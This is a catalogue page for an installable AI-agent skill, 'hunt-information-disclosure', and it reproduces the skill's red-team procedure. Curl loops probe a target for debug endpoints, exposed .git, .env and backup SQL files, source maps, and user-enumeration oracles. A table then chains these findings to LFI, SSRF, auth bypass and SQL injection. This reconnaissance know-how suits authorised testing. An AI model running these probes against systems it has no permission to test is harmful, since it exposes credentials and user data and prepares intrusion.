SkillAgentSearch skills...

hunt-information-disclosure

Hunt error leakage, DVCS exposure, source maps, config files, and differential oracles.

Install / Use

npx skills add uphiago/recon-skills --skill hunt-information-disclosure

Installs into whichever agent you are using.

About this skill
📄

SKILL.md

Installable skill definition

Quality Score

89/100

Supported Platforms

Universal

Our assessment of hunt-information-disclosure

hunt-information-disclosure scores 89/100 on our quality scale, 1201st of 4,259 Development & Engineering skills we index (top 29%).

Its SKILL.md is 7.3 KB long, well organised into 33 sections with 6 code examples: a thorough specification that gives an agent plenty to work with.

With 1,280 GitHub stars, it is one of the more widely adopted skills in the catalogue.

Substance
29/30
Structure
20/20
Description
12/15
Adoption
13/20
Freshness
15/15

Maintenance, license and trust

  • The repository was last updated 29 days ago, so hunt-information-disclosure is actively maintained.
  • It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
  • Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.

hunt-information-disclosure compared with similar skills

All 4 of these similar skills score higher than hunt-information-disclosure; compare them before choosing.

SkillScoreStarsUpdatedFormat
hunt-information-disclosure (this skill)by uphiago891.3k29d agoSKILL.md
Agent-Reachby Panniantong10086.6k15d agoCLAUDE.md
headroomby headroomlabs-ai10074.2ktodayCLAUDE.md
ai-job-searchby MadsLorentzen10044.6k1d agoCLAUDE.md
claude-howtoby luongnv8910041.7ktodayCLAUDE.md

Frequently asked questions

How do I install hunt-information-disclosure?
Run npx skills add uphiago/recon-skills --skill hunt-information-disclosure. The install tabs above show the steps for each supported agent.
Which AI agents does hunt-information-disclosure work with?
It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
Is hunt-information-disclosure safe to use?
It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
Is hunt-information-disclosure still maintained?
The repository was last updated 29 days ago, so hunt-information-disclosure is actively maintained.

name: hunt-information-disclosure description: Hunt error leakage, DVCS exposure, source maps, config files, and differential oracles. category: redteam version: 1.1.0 revision_date: 2026-07-25 license: MIT platforms: [linux] compatibility: Requires curl, python3, httpx tags: [redteam, information-disclosure, error-leakage, source-maps, config, enumeration] related_skills:

  • source-leak-hunt
  • js-secrets-extraction
  • error-log-mining
  • web-enumeration

Information Disclosure Hunting

Hunt for information exposure through stack traces, debug endpoints, versioned path discovery, source maps, and differential oracles. Each disclosure amplifies other vulnerabilities — a version number enables CVE targeting, a server path enables LFI, a schema leak enables auth bypass, and an error message reveals internal infrastructure.

When to Use

  • Applications return verbose error messages with stack traces, file paths, or SQL fragments.
  • Source maps (.js.map) are deployed to production.
  • Versioned static assets reveal framework/CMS versions.
  • API responses differ by object existence (user enumeration by status/length/time).
  • Debug endpoints, health checks, or status pages expose internal state.

Quick Detection

# Trigger errors on common paths
for path in "/nonexistent" "/%00" "/.." "/error" "/debug"; do
  curl --max-time 30 --connect-timeout 10 -sk "https://target.com$path" | grep -iE "stack|trace|exception|error|warning|debug|line [0-9]+" | head -5
done

Procedure

Phase 1 — Error & Exception Leakage

# Trigger errors with malformed input
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/users?id='"
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/api/login" -d '{"username":null}'
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/search?q=%00"

# Check response for sensitive data
# Stack traces → file paths, line numbers, framework version
# SQL errors → table names, column names, DB type
# Deserialization errors → class names, serialization format
# Template errors → template paths, engine type

# Fuzz for debug endpoints
for path in "/debug" "/__debug__" "/debugbar" "/_debug_toolbar" "/.well-known/debug" \
            "/actuator" "/actuator/info" "/actuator/env" "/actuator/health"; do
  curl --max-time 30 --connect-timeout 10 -sk "https://target.com$path" -w "\n%{http_code} — $path\n" -o /dev/null
done

Phase 2 — DVCS & Config File Discovery

# Git, SVN, Mercurial exposure
for path in "/.git/HEAD" "/.git/config" "/.svn/entries" "/.hg/store/"; do
  curl --max-time 30 --connect-timeout 10 -sk "https://target.com$path" -w "%{http_code} — $path\n" -o /dev/null
done

# Config and env files
for pattern in ".env" ".env.local" ".env.production" ".env.staging" \
               "config.json" "config.yml" "settings.py" "settings.php" \
               "wp-config.php" "web.config" "app.config"; do
  curl --max-time 30 --connect-timeout 10 -sk "https://target.com/$pattern" -w "%{http_code} — $pattern\n" -o /dev/null
done

# Backup files
for pattern in "backup.zip" "backup.sql" "dump.sql" "db.sql" \
               "database.sql" "export.sql" "site.tar.gz" "backup.tar.gz"; do
  curl --max-time 30 --connect-timeout 10 -sk "https://target.com/$pattern" -w "%{http_code} — $pattern\n" -o /dev/null
done

Phase 3 — Source Map Exploitation

# Find .js.map files
curl --max-time 30 --connect-timeout 10 -sk "https://target.com" | grep -Eo '[^"\s]+\.js\.map' | sort -u

# Download and extract
wget "https://target.com/static/app.js.map"
node -e "
const m=require('./app.js.map');
m.sources.forEach((s,i)=>require('fs').writeFileSync(s.split('/').pop(),m.sourcesContent[i]));
console.log('Extracted '+m.sources.length+' files');
"

# Look for NEXT_PUBLIC env vars in extracted source
grep -r "NEXT_PUBLIC_" extracted_files/ | cut -d= -f1 | sort -u

Phase 4 — Differential Oracles

# User enumeration via status code
for id in {1..50}; do
  curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/users/$id" -w "$id — %{http_code}\n" -o /dev/null
done

# Object existence via response size
for id in {1..100}; do
  size=$(curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/orders/$id" -w "%{size_download}" -o /dev/null)
  echo "$id — $size bytes"
done | awk '$2 > 100 {print "EXISTS: "$0}'

# Timing oracle for blind enumeration
for id in {1..50}; do
  time curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/users/$id" -o /dev/null -w "%{time_total}s $id\n"
done | sort -rn

# ETag/304 oracle
for id in {1..10}; do
  etag=$(curl --max-time 30 --connect-timeout 10 -skI "https://target.com/api/users/$id" | grep -i etag)
  echo "$id: $etag"
done

Phase 5 — Version & Technology Discovery

# Framework version from static assets
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/static/admin/css/base.css" | head -5
curl --max-time 30 --connect-timeout 10 -sk "https://target.com" | grep -Eo '(?:Django|Laravel|Rails|Express|Next\.js|Nuxt)[\s/]*v?[0-9.]+'

# Package manager lock files
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/composer.lock" | jq -r '.packages[] | select(.version) | "\(.name)@\(.version)"' 2>/dev/null
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/package-lock.json" | jq -r '.packages | to_entries[] | "\(.key)@\(.value.version)"' 2>/dev/null
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/yarn.lock" | head -30

Phase 6 — Chaining Disclosures

Each disclosure type provides inputs for other attack vectors:

| Disclosure | Chains to | |---|---| | Framework version | CVE database lookup | | Server path | LFI path traversal | | Internal IP | SSRF target | | API schema | Auth bypass via undocumented endpoint | | Dependency version | Supply chain vulnerability | | NEXT_PUBLIC variables | API key/Supabase/Firebase access | | SQL error | SQL injection confirmation + DB type |

Pitfalls

  • Not every error message is exploitable. A generic "An error occurred" page with no details is not a finding.
  • Source maps may be empty or stripped. Verify extracted content before reporting.
  • Differential oracles are statistical. Confirm with at least 3 samples before reporting.
  • .git exposure must contain actual repo data, not just HTTP 200 on a path. A catch-all SPA may return 200 for /.git/HEAD without serving git data.
  • Version disclosure alone is usually LOW severity. Chain it — version → CVE → exploit.

Verification

  1. Error message contains actionable internal data (file path, SQL query, framework version).
  2. Source map extraction produces real source files with identifiable code (not just webpack bootstrap).
  3. Differential oracle consistently distinguishes between existing and non-existing resources.
  4. Chain the disclosure to another vulnerability before reporting — standalone info disclosure is rarely critical.
  5. For config files: the leaked data must contain credentials, API keys, or connection strings (not just generic config).

Related Skills

  • source-leak-hunt — Focused on .env, .git, and config file leakage.
  • js-secrets-extraction — API keys and tokens in JavaScript bundles.
  • error-log-mining — PHP error logs with credential and query leakage.
  • web-enumeration — Path discovery that reveals sensitive endpoints.

Related Skills

View on GitHub
GitHub Stars1.3k
CategoryDevelopment
Updated29d ago
Forks215

Languages

Python

Trust signals

100/100

From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.

No cautions